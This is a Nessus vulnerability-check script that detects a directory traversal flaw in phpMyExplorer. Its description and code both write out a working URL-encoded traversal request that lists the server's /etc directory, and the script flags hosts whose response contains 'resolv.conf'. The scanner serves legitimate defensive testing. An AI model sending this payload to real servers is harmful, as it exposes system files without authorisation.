#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10750);
 
 name["english"] = "phpMyExplorer dir traversal";
 script_name(english:name["english"]);
 
 desc["english"] = "phpMyExplorer is vulnerable to a 
directory traversal attack which allows anyone to
make the remote web server read and display arbitrary
directories.

Example:
    GET /index.php?chemin=..%2F..%2F..%2F..%2F%2Fetc

will return the content of the remote /etc directory

Solution: None available at this time
Risk factor : Serious";

 script_description(english:desc["english"]);
 
 summary["english"] = "phpMyExplorer dir traversal";
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;
cgibin = cgibin();


if(get_port_state(port))
{
 soc = http_open_socket(port);
 if(soc)
 {
  buf = string(cgibin, "/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc");
  buf = http_get(item:buf, port:port);
  send(socket:soc, data:buf);
  rep = recv(soc, length:4096);
  if("resolv.conf" >< rep)
  	security_hole(port);
  close(soc);
 }
}
